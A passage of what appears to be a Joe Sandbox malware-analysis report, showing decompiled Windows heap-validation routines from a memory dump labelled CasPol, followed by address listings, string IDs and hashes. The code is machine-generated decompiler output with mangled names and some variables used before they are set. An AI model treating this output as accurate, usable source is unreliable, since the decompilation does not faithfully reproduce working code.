										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E0162B150();
									} else {
										E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E0162B150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E016DFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E0162B150();
										} else {
											E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0167D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E0162B150();
								} else {
									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E016EA80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E0164E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E016EA80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E0164E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E0164A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E0164A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E0164BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E016D23E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E01621F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                                0x016e4af7
                                                                0x016e4afb
                                                                0x016e4afd
                                                                0x016e4b01
                                                                0x016e4b03
                                                                0x016e4b08
                                                                0x016e4b0a
                                                                0x016e4b0f
                                                                0x016e4eb5
                                                                0x016e4eb5
                                                                0x016e4ebb
                                                                0x016e50d5
                                                                0x016e50d8
                                                                0x016e4ff6
                                                                0x00000000
                                                                0x016e4ff6
                                                                0x016e50de
                                                                0x016e50e4
                                                                0x016e50e8
                                                                0x016e5107
                                                                0x016e510c
                                                                0x016e50ea
                                                                0x016e50ff
                                                                0x016e5104
                                                                0x016e5112
                                                                0x016e5115
                                                                0x016e5118
                                                                0x016e5119
                                                                0x016e50cb
                                                                0x016e50cb
                                                                0x016e50af
                                                                0x00000000
                                                                0x016e50af
                                                                0x016e4ecb
                                                                0x016e50b6
                                                                0x016e50bb
                                                                0x016e4ed1
                                                                0x016e4ee6
                                                                0x016e4eeb
                                                                0x016e50c1
                                                                0x016e50c2
                                                                0x016e50c5
                                                                0x016e50c6
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4b15
                                                                0x016e4b15
                                                                0x016e4b1c
                                                                0x016e4b1e
                                                                0x016e4b23
                                                                0x016e4b27
                                                                0x016e4b33
                                                                0x016e4b38
                                                                0x016e4b3a
                                                                0x016e4b3c
                                                                0x016e4b41
                                                                0x016e4b41
                                                                0x016e4b3a
                                                                0x016e4b52
                                                                0x016e5045
                                                                0x016e504b
                                                                0x016e504f
                                                                0x016e506e
                                                                0x016e5073
                                                                0x016e5051
                                                                0x016e5066
                                                                0x016e506b
                                                                0x016e5083
                                                                0x016e5088
                                                                0x016e5088
                                                                0x016e508a
                                                                0x016e5091
                                                                0x016e5099
                                                                0x016e5099
                                                                0x016e509d
                                                                0x016e50a7
                                                                0x016e50ad
                                                                0x016e50ad
                                                                0x016e50ad
                                                                0x00000000
                                                                0x016e509d
                                                                0x016e4b58
                                                                0x016e4b5b
                                                                0x016e4b5e
                                                                0x016e4b63
                                                                0x016e4b66
                                                                0x016e4b69
                                                                0x016e4b6f
                                                                0x016e4be4
                                                                0x016e4bf0
                                                                0x016e4bf2
                                                                0x016e4bf5
                                                                0x016e4dc3
                                                                0x016e4dc6
                                                                0x016e4dc9
                                                                0x016e4dce
                                                                0x016e4dce
                                                                0x016e4dd0
                                                                0x016e4dd0
                                                                0x016e4dd5
                                                                0x016e4def
                                                                0x016e4dd7
                                                                0x016e4de7
                                                                0x016e4de7
                                                                0x016e4df3
                                                                0x016e5001
                                                                0x016e5007
                                                                0x016e500b
                                                                0x016e502a
                                                                0x016e502f
                                                                0x016e500d
                                                                0x016e5022
                                                                0x016e5027
                                                                0x016e5039
                                                                0x016e503a
                                                                0x016e503b
                                                                0x00000000
                                                                0x016e4df9
                                                                0x016e4dfd
                                                                0x016e4e90
                                                                0x016e4e94
                                                                0x016e4e9e
                                                                0x016e4ea4
                                                                0x016e4ea4
                                                                0x016e4ea4
                                                                0x016e4ea6
                                                                0x016e4ea6
                                                                0x00000000
                                                                0x016e4ea6
                                                                0x016e4e03
                                                                0x016e4e08
                                                                0x016e4f88
                                                                0x016e4f92
                                                                0x016e4f99
                                                                0x016e4f9c
                                                                0x016e4fe0
                                                                0x016e4fe4
                                                                0x016e4fee
                                                                0x016e4ff4
                                                                0x016e4ff4
                                                                0x016e4ff4
                                                                0x00000000
                                                                0x016e4fe4
                                                                0x016e4f9e
                                                                0x016e4fa4
                                                                0x016e4fa8
                                                                0x016e4fc7
                                                                0x016e4fcc
                                                                0x016e4faa
                                                                0x016e4fbf
                                                                0x016e4fc4
                                                                0x016e4fd2
                                                                0x016e4fd5
                                                                0x016e4fd6
                                                                0x016e4f34
                                                                0x016e4f34
                                                                0x00000000
                                                                0x016e4f39
                                                                0x016e4e0e
                                                                0x016e4e14
                                                                0x016e4e1b
                                                                0x016e4e25
                                                                0x016e4e2b
                                                                0x016e4e2b
                                                                0x016e4e33
                                                                0x016e4e38
                                                                0x016e4e8a
                                                                0x016e4e8a
                                                                0x00000000
                                                                0x016e4e3a
                                                                0x016e4e3e
                                                                0x016e4e43
                                                                0x016e4e47
                                                                0x016e4e53
                                                                0x016e4e58
                                                                0x016e4e5a
                                                                0x016e4e5c
                                                                0x016e4e61
                                                                0x016e4e61
                                                                0x016e4e5a
                                                                0x016e4e6e
                                                                0x016e4f41
                                                                0x016e4f47
                                                                0x016e4f4b
                                                                0x016e4f6a
                                                                0x016e4f6f
                                                                0x016e4f4d
                                                                0x016e4f62
                                                                0x016e4f67
                                                                0x016e4f7f
                                                                0x016e4f80
                                                                0x016e4f81
                                                                0x00000000
                                                                0x016e4e74
                                                                0x016e4e78
                                                                0x016e4e82
                                                                0x016e4e88
                                                                0x016e4e88
                                                                0x00000000
                                                                0x016e4e78
                                                                0x016e4e6e
                                                                0x016e4e38
                                                                0x016e4df3
                                                                0x016e4bfe
                                                                0x016e4c01
                                                                0x016e4c04
                                                                0x016e4c07
                                                                0x016e4c09
                                                                0x016e4c0c
                                                                0x016e4c0e
                                                                0x016e4c0e
                                                                0x016e4c11
                                                                0x016e4c11
                                                                0x016e4c0c
                                                                0x016e4c14
                                                                0x016e4c17
                                                                0x016e4dae
                                                                0x016e4db2
                                                                0x016e4db7
                                                                0x016e4dba
                                                                0x016e4dbd
                                                                0x016e4ef1
                                                                0x016e4ef7
                                                                0x016e4efb
                                                                0x016e4f1a
                                                                0x016e4f1f
                                                                0x016e4efd
                                                                0x016e4f12
                                                                0x016e4f17
                                                                0x016e4f2b
                                                                0x016e4f2b
                                                                0x016e4f2d
                                                                0x016e4f2e
                                                                0x016e4f2f
                                                                0x00000000
                                                                0x016e4f2f
                                                                0x00000000
                                                                0x016e4c1d
                                                                0x016e4c1d
                                                                0x016e4c20
                                                                0x016e4c23
                                                                0x016e4c26
                                                                0x016e4c29
                                                                0x016e4c2c
                                                                0x016e4c2e
                                                                0x016e4d91
                                                                0x016e4d91
                                                                0x016e4d92
                                                                0x016e4d97
                                                                0x016e4d9e
                                                                0x00000000
                                                                0x016e4d9e
                                                                0x016e4c34
                                                                0x016e4c37
                                                                0x016e4c39
                                                                0x016e4c3c
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4c45
                                                                0x016e4c48
                                                                0x016e4c4e
                                                                0x016e4c50
                                                                0x016e4c78
                                                                0x016e4c78
                                                                0x016e4c7b
                                                                0x016e4c7d
                                                                0x016e4c80
                                                                0x016e4c84
                                                                0x016e4cad
                                                                0x016e4cad
                                                                0x016e4cb0
                                                                0x016e4cb8
                                                                0x016e4cbb
                                                                0x016e4cbe
                                                                0x016e4cc1
                                                                0x016e4cc7
                                                                0x016e4cdc
                                                                0x016e4cc9
                                                                0x016e4cd2
                                                                0x016e4cd4
                                                                0x016e4cd4
                                                                0x016e4cde
                                                                0x016e4ce0
                                                                0x016e4d13
                                                                0x016e4d13
                                                                0x016e4d16
                                                                0x016e4d18
                                                                0x016e4d29
                                                                0x016e4d2a
                                                                0x016e4d2c
                                                                0x016e4d34
                                                                0x016e4d1a
                                                                0x016e4d1a
                                                                0x016e4d1a
                                                                0x016e4d1d
                                                                0x016e4d1f
                                                                0x016e4d22
                                                                0x016e4d24
                                                                0x016e4d24
                                                                0x016e4d3c
                                                                0x016e4d3f
                                                                0x016e4d45
                                                                0x016e4d47
                                                                0x016e4d6c
                                                                0x016e4d6c
                                                                0x016e4d70
                                                                0x016e4d7e
                                                                0x016e4d84
                                                                0x016e4d84
                                                                0x00000000
                                                                0x016e4d49
                                                                0x016e4d49
                                                                0x016e4d56
                                                                0x016e4d56
                                                                0x016e4d59
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4d4e
                                                                0x016e4d50
                                                                0x016e4d52
                                                                0x016e4d8e
                                                                0x016e4d5d
                                                                0x016e4d5f
                                                                0x016e4d67
                                                                0x00000000
                                                                0x016e4d67
                                                                0x016e4d54
                                                                0x016e4d54
                                                                0x016e4d5b
                                                                0x00000000
                                                                0x016e4d5b
                                                                0x016e4ce2
                                                                0x016e4ce2
                                                                0x016e4ce5
                                                                0x016e4ce5
                                                                0x016e4ce7
                                                                0x016e4cfb
                                                                0x016e4ce9
                                                                0x016e4ce9
                                                                0x016e4cec
                                                                0x016e4cef
                                                                0x016e4cf1
                                                                0x016e4cf3
                                                                0x016e4cf3
                                                                0x016e4cf3
                                                                0x016e4cf6
                                                                0x016e4cf6
                                                                0x016e4d02
                                                                0x016e4d05
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4d07
                                                                0x016e4d0f
                                                                0x016e4d11
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4d11
                                                                0x00000000
                                                                0x016e4ce5
                                                                0x016e4ce0
                                                                0x016e4c8a
                                                                0x016e4c8f
                                                                0x016e4c91
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4c9d
                                                                0x00000000
                                                                0x016e4c9d
                                                                0x016e4c52
                                                                0x016e4c5f
                                                                0x016e4c5f
                                                                0x016e4c62
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4c57
                                                                0x016e4c59
                                                                0x016e4c5b
                                                                0x016e4caa
                                                                0x016e4c66
                                                                0x016e4c68
                                                                0x016e4c70
                                                                0x016e4c75
                                                                0x00000000
                                                                0x016e4c75
                                                                0x016e4c5d
                                                                0x016e4c5d
                                                                0x016e4c64
                                                                0x00000000
                                                                0x016e4c64
                                                                0x016e4c17
                                                                0x016e4b75
                                                                0x016e4bc4
                                                                0x016e4bc8
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4bd9
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4b77
                                                                0x016e4b7a
                                                                0x016e4b8c
                                                                0x016e4b7c
                                                                0x016e4b7e
                                                                0x016e4b83
                                                                0x016e4b86
                                                                0x016e4b86
                                                                0x016e4b90
                                                                0x016e4b93
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4b95
                                                                0x016e4bab
                                                                0x016e4bb0
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4bb2
                                                                0x016e4bb9
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4bbb
                                                                0x016e4bbe
                                                                0x016e4bc1
                                                                0x016e4bc1
                                                                0x00000000
                                                                0x016e4bc1
                                                                0x016e4b97
                                                                0x016e4ba4
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4ba6
                                                                0x00000000
                                                                0x016e4ba6
                                                                0x016e4ea9
                                                                0x016e4ea9
                                                                0x016e4eb2
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                • API String ID: 0-3591852110
                                                                • Opcode ID: 31a3f926d8cd6bfc257ba056e5d62b6d2860366530ce0a7ff414bc6225f44d3d
                                                                • Instruction ID: 537974da34dc4c17f618d91f6ff19ceef10c7751849d4fe722114eb113b74efe
                                                                • Opcode Fuzzy Hash: 31a3f926d8cd6bfc257ba056e5d62b6d2860366530ce0a7ff414bc6225f44d3d
                                                                • Instruction Fuzzy Hash: E012BE306026429FDB25DF69C898BB6BBE2EF48614F14865DE486CB741DB35E881CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016E4496 Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 56%
                                                                			E016E4496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E016E49A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x1716378 = _t267;
						asm("int3");
						 *0x1716378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E0165174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E0162B150();
							} else {
								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E0162B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E0162B150();
							} else {
								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E0162B150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x1716350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E01669660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E0165174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E0162B150();
										} else {
											E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E0162B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E0162B150();
									} else {
										E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E0162B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E0162B150();
								} else {
									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E0162B150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E0162B150();
							} else {
								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E016E4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
